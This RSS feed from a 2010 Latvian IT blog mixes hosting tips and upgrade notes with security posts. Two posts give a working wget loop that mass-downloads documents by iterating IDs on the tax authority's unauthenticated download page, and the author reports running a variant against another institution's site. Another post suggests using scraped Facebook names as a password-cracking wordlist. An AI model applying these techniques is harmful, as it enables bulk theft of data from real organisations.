<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>IT sviestapika &#187; Web</title>
	<atom:link href="http://dll.lv/category/web/feed" rel="self" type="application/rss+xml" />
	<link>http://dll.lv</link>
	<description>Par IT un ne tikai</description>
	<lastBuildDate>Mon, 23 Aug 2010 06:40:37 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
		<item>
		<title>Bezmaksas hostings</title>
		<link>http://dll.lv/bezmaksas-hostings</link>
		<comments>http://dll.lv/bezmaksas-hostings#comments</comments>
		<pubDate>Thu, 12 Aug 2010 20:16:53 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[bezmaksas hostings]]></category>
		<category><![CDATA[hostings]]></category>
		<category><![CDATA[lēts hostings]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1213</guid>
		<description><![CDATA[Nejauši uzskrēju vienam bezmaksas hostingam zumic.com. Pats viņu neesmu testējis, bet lasītās atsauksmes bija tīri neko.
Cerams kādam noderēs.
]]></description>
			<content:encoded><![CDATA[<p>Nejauši uzskrēju vienam bezmaksas hostingam <a href="http://www.zymic.com/" target="_blank">zumic.com</a>. Pats viņu neesmu testējis, bet lasītās atsauksmes bija tīri neko.</p>
<p>Cerams kādam noderēs.</p>
]]></content:encoded>
			<wfw:commentRss>http://dll.lv/bezmaksas-hostings/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Mēģinām pielietot EDS konstatēto ievainojamību citur</title>
		<link>http://dll.lv/meginam-pielietot-eds-konstateto-ievainojamibu-citur</link>
		<comments>http://dll.lv/meginam-pielietot-eds-konstateto-ievainojamibu-citur#comments</comments>
		<pubDate>Tue, 10 Aug 2010 17:48:11 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Drošība]]></category>
		<category><![CDATA[How to]]></category>
		<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[audits]]></category>
		<category><![CDATA[autorizācija]]></category>
		<category><![CDATA[Domu grauds]]></category>
		<category><![CDATA[drošības prasības]]></category>
		<category><![CDATA[drošības testēšana]]></category>
		<category><![CDATA[IT drošība]]></category>
		<category><![CDATA[Win]]></category>
		<category><![CDATA[zināšanas]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1201</guid>
		<description><![CDATA[Visiem tagad ir zināms kādā veidā tika iegūti dati no EDS sistēmas- nebija (it kā bija iestrādāta, bet testu rezultātā tika atslēgta) autentifikācija uz failu nolādes.
Kā šādu ievainojamību var izmantot tehniski biju atradis netā un pārpublicēju šeit.
Tā kā teorija un citu piemēri no prakses atšķiras, tad nodomāju patestēt.
Linux gadījumā tas varētu izskatīties šādā veidā:
for i in [...]]]></description>
			<content:encoded><![CDATA[<p>Visiem tagad ir zināms kādā veidā tika iegūti dati no EDS sistēmas- nebija (it kā bija iestrādāta, bet testu rezultātā tika atslēgta) autentifikācija uz failu nolādes.</p>
<p>Kā šādu ievainojamību var izmantot tehniski biju atradis netā un pārpublicēju <a href="http://dll.lv/ka-tika-noladeti-dati-no-vid-eds-sistemas" target="_blank">šeit</a>.</p>
<p>Tā kā teorija un citu piemēri no prakses atšķiras, tad nodomāju patestēt.</p>
<p>Linux gadījumā tas varētu izskatīties šādā veidā:</p>
<blockquote><p>for i in {1..7500000}; do<br />
wget http://www2.vid.gov.lv/eds/Pages/GetDuf.aspx?id=$i;<br />
done</p></blockquote>
<p><span id="more-1201"></span></p>
<p>Bet tā kā mājās stāv W7, un no LiveCD ielādēties ir slinkums izvēlējos garāko ceļu.</p>
<p>wget komandai ir arī windows alternatīva, kuru var atrast <a href="http://www.gnu.org/software/wget/" target="_blank">GNU lapā</a>.</p>
<p>Pēc instalēšanas un notūnēšanas, lai to varētu palaist no jebkuras vietas var ķerties pie nākamā soļa- atrast mājaslapu, kurā ir līdzīga ievainojamība.</p>
<p>Otrs un pareizākais variants būtu radīt šādu ievainojamību kādā savā lapā un tad testēt, bet šoreiz atzīšos, esmu par slinku.</p>
<p>Pēc dažām minūtēm tika atrasta diezgan lielas iestādes lapa, kurā ir līdzīgs gadījums. Pēc http://&#8230;&#8230;lv/file.php?id=, id lauka vērtībā mainot vērtības tiek piedāvāts nolādēt dažādus failus.</p>
<p>Lielākā daļa no testā atklātiem dokumentiem (daži bija php faili, kurus diez vai admins vēlējās, lai varētu nolādēt) ir arī brīvi pieejami no mājaslapas, tā kā uzskatu, ka tā ir funkcionalitāte, nevis trūkums <img src='http://dll.lv/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Mājaslapas adrese ir izmainīt, lai kārtējais tīnis neapciemo šo lapu un &#8230;..</p>
<p>Nu tad pie testa un rezultātiem.</p>
<p>Lai wget un for cikls strādātu uz win, tas ir jāmodificē- man sanāca šāds brīnums:</p>
<blockquote><p>for /l %%i in (1,1,1000) do (wget -r &#8220;http://&#8230;&#8230;..file.php?id=%%i&#8221;)</p></blockquote>
<p>Izskatās easy, bet..</p>
<p>visi iegūtie faili ir nevis nosaukums.paplašinājums, bet:</p>
<p>.file.php?id=1</p>
<p>.file.php?id=2</p>
<p>.file.php?id=3, utt</p>
<p>Ja zinātu, ka visi nolādētie faili ir viena tipa, piemēram, *.doc, tad varētu vienkārši visus pārsaukt par *.doc un lietot laimīgs.</p>
<p>Bet problēma ir tajā, ka starp šiem failiem ir gan pdf, php, doc un sazin vēl kas.</p>
<p>Meklēju risinājumu šai problēmai iekš googles, bet neko prātīgu neatradu. Daudzi ir uzdevuši šādu jautājumu, bet nevienam nebija atbilde.</p>
<p>Vienīgais, ko atradu ir izmantojot -o mainīgo noteikt uzreiz faila nosaukumu, bet šāds piegājiens der tikai, ja tiek nolādēts viens fails un jau ar zināmu paplašinājumu. For ciklā tas nestrādā.</p>
<p>Kāds ir secinājums?</p>
<p>Nolādēt failus ir gaužām vienkārši arī praksē, tikai pēc tam var nākties izlabot failu paplašinājumu.</p>
<p>Manuprāt, problēma slēpjas tajā, ka šādā veidā notiek redirekts uz no file?id uz konkrētu failu, kuru wget programa nespēj korekti paņemt pretī.</p>
]]></content:encoded>
			<wfw:commentRss>http://dll.lv/meginam-pielietot-eds-konstateto-ievainojamibu-citur/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Pods izsmiets vai vēsture atkārtojas</title>
		<link>http://dll.lv/pods-izsmiets-vai-vesture-atkartojas</link>
		<comments>http://dll.lv/pods-izsmiets-vai-vesture-atkartojas#comments</comments>
		<pubDate>Fri, 06 Aug 2010 19:55:59 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Drošība]]></category>
		<category><![CDATA[Drošības caurumi]]></category>
		<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[Wordpress]]></category>
		<category><![CDATA[drošības likums]]></category>
		<category><![CDATA[drošības prasības]]></category>
		<category><![CDATA[drošības testēšana]]></category>
		<category><![CDATA[Incidents]]></category>
		<category><![CDATA[IT]]></category>
		<category><![CDATA[IT drošība]]></category>
		<category><![CDATA[web izstrāde]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1195</guid>
		<description><![CDATA[Tiko uzrakstīju post par boot izsmiešanu un gribas palasīt ko citu.
Un te seko nākamais pārsteigums- pods izsmiets.

Nu ko vēsture atkārtojas..
Pods jau vienreiz tika nonests un cik atceros toreiz autoram bija paša radīts brīnums, bez rezerves kopijām. Tagad Pods griežas(zās) uz wordpress- vai bija mācība un ir rezerves kopija uzzināsim visai drīz.
Man pašam arī pāris mēnešus [...]]]></description>
			<content:encoded><![CDATA[<p>Tiko uzrakstīju post par <a href="http://dll.lv/boot-bistama-lapa-vai-ari-boot-ticis-izsmiets" target="_blank">boot</a> izsmiešanu un gribas palasīt ko citu.</p>
<p>Un te seko nākamais pārsteigums- pods izsmiets.<br />
<a href="http://dll.lv/wp-content/uploads/2010/08/pods.png"><img class="aligncenter size-medium wp-image-1196" title="pods" src="http://dll.lv/wp-content/uploads/2010/08/pods-300x168.png" alt="" width="300" height="168" /></a></p>
<p>Nu ko vēsture atkārtojas..</p>
<p>Pods jau vienreiz tika nonests un cik atceros toreiz autoram bija paša radīts brīnums, bez rezerves kopijām. Tagad Pods griežas(zās) uz wordpress- vai bija mācība un ir rezerves kopija uzzināsim visai drīz.</p>
<p>Man pašam arī pāris mēnešus atpakaļ bija nonests wordpress izmantojot wordpress ievainojamību. Kas par iemeslu bija iekš pods.lv būs interesanti noskaidrot un cerams autors neturēs sveci zem pūra. Varbūt nebija atjaunota pēdējā versija, varbūt kaut kas cits.</p>
<p>Iekš LV ik pa laikam kāda lapa tiek nonesta, taču neesmu dzirdējis ne par vienu sekmīgi pabeigtu izmeklēšanu un notiesājošu spriedumu. Gaidu precedentu, lai tīņi urķi nobītos un beigtu bojāt citiem garastāvokli.</p>
<p>Uzstādīts arī interesants redirekts uz www.kuce.lv, kas liek domāt, ka vainīgais mitinās iekš LV</p>
<p>No sava Hackera neaizbēgsi <img src='http://dll.lv/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> .</p>
]]></content:encoded>
			<wfw:commentRss>http://dll.lv/pods-izsmiets-vai-vesture-atkartojas/feed</wfw:commentRss>
		<slash:comments>10</slash:comments>
		</item>
		<item>
		<title>Boot bīstama lapa vai arī boot ticis izsmiets</title>
		<link>http://dll.lv/boot-bistama-lapa-vai-ari-boot-ticis-izsmiets</link>
		<comments>http://dll.lv/boot-bistama-lapa-vai-ari-boot-ticis-izsmiets#comments</comments>
		<pubDate>Fri, 06 Aug 2010 19:39:10 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Drošība]]></category>
		<category><![CDATA[Drošības caurumi]]></category>
		<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[drošības likums]]></category>
		<category><![CDATA[drošības prasības]]></category>
		<category><![CDATA[drošības testēšana]]></category>
		<category><![CDATA[hostēšanās]]></category>
		<category><![CDATA[IT drošība]]></category>
		<category><![CDATA[web izstrāde]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1192</guid>
		<description><![CDATA[Atnākot mājās pēc vakara wake brauciena izdomāju palasīt, kas jauns noticis pasaulē.
Viss sākas ar google reader atvēršanu un tur mani sagaida brīdinājums- boot ir kaitīga lapa.

Palika interesanti..
Lasu tālāk iekš boot, ka ļaundari ir izmantojuši kādu openx ievainojamību un mājaslapā ievietojuši ļaundabīgu kodu, bet tagad viss ir ticis sakopts.
Būtu interesanti, ja Boot būtu nopublicējis kā viss [...]]]></description>
			<content:encoded><![CDATA[<p>Atnākot mājās pēc vakara wake brauciena izdomāju palasīt, kas jauns noticis pasaulē.<br />
Viss sākas ar google reader atvēršanu un tur mani sagaida brīdinājums- boot ir kaitīga lapa.<br />
<a href="http://dll.lv/wp-content/uploads/2010/08/boot.png"><img class="aligncenter size-medium wp-image-1193" title="boot" src="http://dll.lv/wp-content/uploads/2010/08/boot-300x168.png" alt="" width="300" height="168" /></a></p>
<p>Palika interesanti..<br />
Lasu tālāk iekš <a href="http://www.boot.lv/tehnika/bazam-par-datora-drosibu-apmeklejot-boot-lv-vai-sekoman-lv-vairs-nav-pamata/" target="_blank">boot</a>, ka ļaundari ir izmantojuši kādu openx ievainojamību un mājaslapā ievietojuši ļaundabīgu kodu, bet tagad viss ir ticis sakopts.</p>
<p>Būtu interesanti, ja Boot būtu nopublicējis kā viss tas notika un kādā veidā un ko ļaundari tieši ievietojuši un no kādām adresēm. Būtu labs un pamācošs rakstiņš.</p>
<p>Zelta teiciens sevi attaisno- No sava Hackera neizbēksi, tāpēc taisām rezerves kopijas <img src='http://dll.lv/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://dll.lv/boot-bistama-lapa-vai-ari-boot-ticis-izsmiets/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Kā tika nolādēti dati no VID EDS sistēmas?</title>
		<link>http://dll.lv/ka-tika-noladeti-dati-no-vid-eds-sistemas</link>
		<comments>http://dll.lv/ka-tika-noladeti-dati-no-vid-eds-sistemas#comments</comments>
		<pubDate>Wed, 04 Aug 2010 07:30:21 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Drošība]]></category>
		<category><![CDATA[How to]]></category>
		<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[drošības prasības]]></category>
		<category><![CDATA[EDS]]></category>
		<category><![CDATA[IT]]></category>
		<category><![CDATA[IT drošība]]></category>
		<category><![CDATA[VID]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1187</guid>
		<description><![CDATA[Šodien klejojot par netu atradu veidu kā iespējams tika nopumpēti dati no EDS sistēmas.
Viss ģeniālais ir vienkāršs un lai cilvēki redzētu cik tieši tas ir vienkārši tad pārpublicēju pašu kodu, kas varēja izskatīties aptuveni šāds:
Linux veidīgā konsolē uzrakstām un priecājamies
for i in {1..7500000}; do
wget http://www2.vid.gov.lv/eds/Pages/GetDuf.aspx?id=$i;
done
Šis piemērs parāda veidu kādā šādas ievainojamības izmantot un attiecīgi modificējot [...]]]></description>
			<content:encoded><![CDATA[<p>Šodien klejojot par netu atradu veidu kā iespējams tika nopumpēti dati no EDS sistēmas.<br />
Viss ģeniālais ir vienkāršs un lai cilvēki redzētu cik tieši tas ir vienkārši tad pārpublicēju pašu kodu, kas varēja izskatīties aptuveni šāds:<br />
Linux veidīgā konsolē uzrakstām un priecājamies</p>
<blockquote><p><code>for i in {1..7500000}; do<br />
wget http://www2.vid.gov.lv/eds/Pages/GetDuf.aspx?id=$i;<br />
done</code></p></blockquote>
<p>Šis piemērs parāda veidu kādā šādas ievainojamības izmantot un attiecīgi modificējot piedzīt arī citiem nedarbiem.</p>
]]></content:encoded>
			<wfw:commentRss>http://dll.lv/ka-tika-noladeti-dati-no-vid-eds-sistemas/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Lejupielādēti un sistematizēti ap 100 miljonu facebook lietotāju datu</title>
		<link>http://dll.lv/lejupieladeti-un-sistematizeti-ap-100-miljonu-facebook-lietotaju-datu</link>
		<comments>http://dll.lv/lejupieladeti-un-sistematizeti-ap-100-miljonu-facebook-lietotaju-datu#comments</comments>
		<pubDate>Tue, 03 Aug 2010 21:14:45 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Drošība]]></category>
		<category><![CDATA[Drošības caurumi]]></category>
		<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[drošības likums]]></category>
		<category><![CDATA[drošības prasības]]></category>
		<category><![CDATA[Incidents]]></category>
		<category><![CDATA[IT drošība]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1185</guid>
		<description><![CDATA[Blackhalt blogā pamanīju rakstu par facebook lietotāju publiski pieejamās informācijas apkopošanu. Raksts ar visiem torentu linkiem pieejams šeit http://blackhalt.blogspot.com/2010/08/lejupieladeti-un-sistematizeti-100.html
Raksta kopija:
Kāds Ron Bowes lejupielādējis, sistematizējis un publiskojis Facebook publiskās daļas ievērojamu daudzumu lietotāju datus.
Ja nekļūdos, tad savākti ir tikai tie lietotāju dati, kuru saturēja tikai latīņu burtus.
An additional limitation is that these are only users whose [...]]]></description>
			<content:encoded><![CDATA[<p>Blackhalt blogā pamanīju rakstu par facebook lietotāju publiski pieejamās informācijas apkopošanu. Raksts ar visiem torentu linkiem pieejams šeit <a href="http://blackhalt.blogspot.com/2010/08/lejupieladeti-un-sistematizeti-100.html">http://blackhalt.blogspot.com/2010/08/lejupieladeti-un-sistematizeti-100.html</a></p>
<p>Raksta kopija:</p>
<blockquote><p><code>Kāds Ron Bowes lejupielādējis, sistematizējis un publiskojis Facebook publiskās daļas ievērojamu daudzumu lietotāju datus.<br />
Ja nekļūdos, tad savākti ir tikai tie lietotāju dati, kuru saturēja tikai latīņu burtus.</p>
<p>An additional limitation is that these are only users whose first characters are from the latin charset. I plan to add non-Latin names in future releases.</p>
<p>Lejupielādētie dati tika saarhivēti bz2 datņu formātos un publicēti izmantojot BitTorrent.</p>
<p>Lejupielādējot 2.79 GiB datņu kopu, jebkurš iegūst šādas datnes:</p>
<p>Filename                        Description<br />
-------------------------------------------------------------------------<br />
facebook.rb                     The script used to generate these files (v1)<br />
facebook.nse                    The script that will be used for the second pass (v2)<br />
facebook-urls                   The full URLs to every profile<br />
facebook-names-original         All names, including duplicates<br />
facebook-names-unique           All names, no duplicates<br />
facebook-names-withcount        All names, no duplicates but with a count<br />
facebook-firstnames-withcount   All first names (with count)<br />
facebook-lastnames-withcount    All last names (with count)<br />
facebook-f.last-withcount       All first initial last name (with count)<br />
facebook-first.l-withcount      All first name last initial (with count)</p>
<p>Manuprāt, interesantākie ir facebook-urls (URL no izmantotajiem lietotājiem) un visi vārdi un uzvārdi.</p>
<p>No šīm datnēm var izveidot svaigu un aktuālu (!) vārdnīcu (wordlist) - paroļu, hash utml piemeklēšanai.</p>
<p>Jāpiezīmē, ka atarhivējot kādu no bz2 datnēm, to izmērs var sasniegt vairākus GiB tīra teksta, piemēram, facebook-urls.txt.bz2 ~1.3 GiB būs ~9.7 GiB.<br />
Datņu atvēršanai jāizmanto tādas programmas, kas spēj tādu datu apjomu atvērt pakāpeniski.</p>
<p>Saite uz torrent datni: Facebook directory - personal details for 100 million users (download torrent) - TPB<br />
Saite uz Ron Bowes bloga ierakstu: SkullSecurity » Blog Archive » Return of the Facebook Snatchers.</p>
<p>P.S. Kurš pirmais publicēs analoģiskus datus par draugiem.lv?</code></p></blockquote>
<p>Ko tieši darīt ar šo info nezinu, bet kā saka, lai ir informācija- kā to pielietot izdomāsim.<br />
Kā arī liek aizdomāties par publiskā telpā pieejamās informācijas nekaitīgumu.. jo kas Tev liekas nekaitīgs kādam var izrādīties medusmaize.</p>
]]></content:encoded>
			<wfw:commentRss>http://dll.lv/lejupieladeti-un-sistematizeti-ap-100-miljonu-facebook-lietotaju-datu/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Atjaunojam wordpress</title>
		<link>http://dll.lv/atjaunojam-wordpress</link>
		<comments>http://dll.lv/atjaunojam-wordpress#comments</comments>
		<pubDate>Sat, 26 Jun 2010 10:58:16 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Drošība]]></category>
		<category><![CDATA[How to]]></category>
		<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[Wordpress]]></category>
		<category><![CDATA[atjaunojam]]></category>
		<category><![CDATA[jauna versija]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1163</guid>
		<description><![CDATA[Pamanīju, ka ir iznākusi wordpress 3.0 versija un aktīvi sāku migrācijas procesu izmantojot oficiālo manuāli:
Tas sastāvēja no 5 soļiem:

Uztaisām lapas pilnu rezerves kopiju (mysql un failu),
Nolādējam jauno wordpress un to atarhivējam,
Izdzēšam wp-includes un wp-admin direktoijas,
kopējam pa virsu jaunos failus (izņemot wp-content direktoriju!!! tai jāsaglabājas vecajai),
Pirmo reizi logojoties administrēšanas panelī piedāvā izmainīt datubāzes struktūru, to izdarām.

Atjaunināšanas process [...]]]></description>
			<content:encoded><![CDATA[<p>Pamanīju, ka ir iznākusi wordpress 3.0 versija un aktīvi sāku migrācijas procesu izmantojot oficiālo <a href="http://codex.wordpress.org/Upgrading_WordPress" target="_blank">manuāli</a>:</p>
<p>Tas sastāvēja no 5 soļiem:</p>
<ul>
<li>Uztaisām lapas pilnu rezerves kopiju (mysql un failu),</li>
<li>Nolādējam jauno wordpress un to atarhivējam,</li>
<li>Izdzēšam <code>wp-includes un <code>wp-admin direktoijas,</code></code></li>
<li>kopējam pa virsu jaunos failus (izņemot wp-content direktoriju!!! tai jāsaglabājas vecajai),</li>
<li>Pirmo reizi logojoties administrēšanas panelī piedāvā izmainīt datubāzes struktūru, to izdarām.</li>
</ul>
<p>Atjaunināšanas process ir beidzies veiksmīgi.</p>
<p>Ērtāk noteikti būtu izmantot automātisko atjaunināšanas fīču- tiem, kas nav nogriezuši apache lietotājam tiesības rakstīt/dzēst.</p>
<p>Uz ātro nekādas lielas izmaiņas neredzu, ja nu vienīgi administrēšanas panelī background no tumši pelēka ir pārvērties gaiši pelēkā un apziņa- lietoju jaunāko <img src='http://dll.lv/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Papildinājums- aiz intereses sameklēju, kas tad ir īsti <a href="http://wordpress.org/development/" target="_blank">jauns 3.0 versijā</a> un kā izrādās ļoti daudz un būtiskas izmaiņas, no kurām man šķita svarīgākās:</p>
<ul>
<li>izvēlēties lietotājvārdu instalācijas laikā- jo pēc tam nav jāveido jauns lietotājs un jādzēš ārā admin,</li>
<li>plašākas pielāgošanas iespējas, kas samazina nepieciešamību labot wordpress failus manuāli (kas man ļoti kaitināja salīdzinot wordpress ar joomlu, kur gandrīz visu varēja izdarīt nelienot pašā kodā).</li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://dll.lv/atjaunojam-wordpress/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Second step in forensic investigation vai hackeri uzbrūk 2</title>
		<link>http://dll.lv/second-step-in-forensic-investigation-vai-hackeri-uzbruk-2</link>
		<comments>http://dll.lv/second-step-in-forensic-investigation-vai-hackeri-uzbruk-2#comments</comments>
		<pubDate>Sun, 16 May 2010 10:18:42 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Drošība]]></category>
		<category><![CDATA[How to]]></category>
		<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[Wordpress]]></category>
		<category><![CDATA[audits]]></category>
		<category><![CDATA[autentifikācija]]></category>
		<category><![CDATA[autorizācija]]></category>
		<category><![CDATA[drošības prasības]]></category>
		<category><![CDATA[drošības testēšana]]></category>
		<category><![CDATA[Incidents]]></category>
		<category><![CDATA[IT]]></category>
		<category><![CDATA[IT drošība]]></category>
		<category><![CDATA[IT projektu problēms]]></category>
		<category><![CDATA[kodējam]]></category>
		<category><![CDATA[pieredze]]></category>
		<category><![CDATA[projekti]]></category>
		<category><![CDATA[web izstrāde]]></category>
		<category><![CDATA[wordpress]]></category>
		<category><![CDATA[zināšanas]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1085</guid>
		<description><![CDATA[Nedēļu atpakaļ notika vēl viens interesants notikums, par kuru nebija laiks uzrakstīt.
Bet tā kā tas bija gana aizraujošs un iespējams kādam ļoti noderīgs, tad 6dienas dienā nolēmu to aprakstīt.
Viss sākās ar to, ka atnākot 5dien mājās atvēru pārlūkā savu blogu un tur man priekšā sagaidīja šāda bilde:

No sākuma cerēju, ka tas ir kaut kāds gļuks [...]]]></description>
			<content:encoded><![CDATA[<p>Nedēļu atpakaļ notika vēl viens interesants notikums, par kuru nebija laiks uzrakstīt.<br />
Bet tā kā tas bija gana aizraujošs un iespējams kādam ļoti noderīgs, tad 6dienas dienā nolēmu to aprakstīt.</p>
<p>Viss sākās ar to, ka atnākot 5dien mājās atvēru pārlūkā savu blogu un tur man priekšā sagaidīja šāda bilde:</p>
<p><a href="http://dll.lv/wp-content/uploads/2010/05/dllhacked.png"><img class="aligncenter size-medium wp-image-1098" title="dllhacked" src="http://dll.lv/wp-content/uploads/2010/05/dllhacked-300x168.png" alt="" width="300" height="168" /></a></p>
<p><span id="more-1085"></span>No sākuma cerēju, ka tas ir kaut kāds gļuks (naivi ne?) un atvēru administrēšanas paneli, bet tur tiešām kā pēdējais raksts rādījās &#8220;Hacked by n2n&#8221;.</p>
<p>Jocīgi bija arī tas, ka visi raksti kopš 2009. gada bija ievietoti &#8220;Trash&#8221;.</p>
<p>Pieņemu, ka nedarbs pastrādāts un brīnumdaris licis mani mierā, lēnā garā mēģinu saprast kas un kā.</p>
<p>Bet, kas tev deva- pēc aptuveni 1. minūtes pienāk epasts no wordpress- admin lietotājam nomainīts epasts un pieprasīta jauna parole.</p>
<p><a href="http://dll.lv/wp-content/uploads/2010/05/hacked_user.png"><img class="aligncenter size-medium wp-image-1100" title="hacked_user" src="http://dll.lv/wp-content/uploads/2010/05/hacked_user-300x168.png" alt="" width="300" height="168" /></a></p>
<p>Skaidrs tagad džekiņš jau mēģina tikt pie wordpress admin konsoles. Neko darīt- jābloķē viņam pieeja <img src='http://dll.lv/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>No teorijas- ja vari kontrolēt ko tieši brīnumdaris (hacker) dara tavā lapā, serverī, utt, tas neapdraud draudu konfidencialitāti, integritāti, pieejamību, un ja tas palīdzēs viņu noķert, tad pieeju var riskēt saglabāt.</p>
<p>Ātri ielogojos hostera config panelī un aizliedzu piekļūt visam saturam (izņemot no manas IP).</p>
<p>Darīts- jāsāk skatīties kapēc tas varēja notikt-</p>
<p>Sāku tāpat, kā iepriekšējā rakstā par <a href="http://dll.lv/hackeri-uzbruk-vai-gadas-ari-ta" target="_blank">testa vides problēmām</a> ar webalizer un awstat analīzi.</p>
<p>Skatos references:</p>
<p>pēdējā un svaigākā no pods.lv <img src='http://dll.lv/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Atveru pods.lv- tiešām pie pēdējiem komentāriem &#8220;Hacked by n2n&#8221;:<a href="http://dll.lv/wp-content/uploads/2010/05/pods.png"><img class="aligncenter size-medium wp-image-1104" title="pods" src="http://dll.lv/wp-content/uploads/2010/05/pods-300x63.png" alt="" width="300" height="63" /></a></p>
<p>Cik sapratu, tas ir plugins, kas attēlo saistītos rakstus un tiklīdz manam rakstam nomainījās nosaukums, tas attēlojās iekš pods.lv.</p>
<p>Viltus trauksme ejam tālāk.</p>
<p>Kas mums ir ar apmeklējumu?</p>
<p>1 apmeklētās apskatījis- 408 lapas un uztaisījis 1507 hitus- uztaisītu noteikti vairāk, ja nepiegrieztu pieeju <img src='http://dll.lv/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Skatāmies, ko viņš ir vēris vaļā:</p>
<p><a href="http://dll.lv/wp-content/uploads/2010/05/ajax.png"><img class="aligncenter size-medium wp-image-1106" title="ajax" src="http://dll.lv/wp-content/uploads/2010/05/ajax-300x35.png" alt="" width="300" height="35" /></a></p>
<p>Tātad ievainojamība bija šajā failā.</p>
<p>Skatāmies vai varam sazīmēt ļauno IP adresi- varam 41.99.45.23. Google piedāvā <a href="http://ip-whois-lookup.com/lookup.php?ip=41.99.45.23" target="_blank">izsmalcināti info</a> par to.</p>
<p>Atveru wordpres.org un skatos vai nav konstatēta kļūda šinī failā un 2.9.2(pēdējā aktuālā uz to brīdi)-<strong> viss kārtībā, kļūda ir bet par to publika vēl nezin </strong> <img src='http://dll.lv/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Vairākos forumos (piemēram <a href="http://wordpress.org/support/topic/359446" target="_blank">šinī</a>) ir arī konstatēta šāda problēma, bet pagaidām bez atrisinājuma.</p>
<p>Atveru googli un mēģinu kaut ko sagooglēt.</p>
<p>Martā vienā<a href="http://sql-injection-tools.blogspot.com/2010/03/wordpress-sqlrficgi-scanner.html" target="_blank"> lapā</a> ir publicēts skaners, kas mēģina exploitēt arī šo failu.</p>
<p>Iespējams, ka pret mani tika pielietots tieši šis <img src='http://dll.lv/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  Vēlāk biju domājis paeksperimentēt ko viņš tieši dara, kā strādā un kādus rezultātus var iegūt, bet kaut kā vēl līdz šai dienai nav sanācis laiks.</p>
<p>Atšķirībā no iepriekšējā raksta &#8220;<a href="http://dll.lv/hackeri-uzbruk-vai-gadas-ari-ta" target="_blank">Hackeri uzbrūk</a>&#8220;- šoreiz ir pieejami apache access logs.</p>
<p>Sākumā ar lielu entuziasmu, bet pēc tam ar apnicību gāju tam cauri. Tomēr neko sakarīgu atrast neizdevās.</p>
<p>Visu laiku viens un tas pats-</p>
<p>1) admin-ajax.php failam tiek veikts POST pieprasījums- ļoti žēļ, ka apacis nelogo POST pieprasījumus, tas uzreiz atviegloto manu darbu un dotu skaidru atbildi- ko īsti brīnumdaris tur darīja.</p>
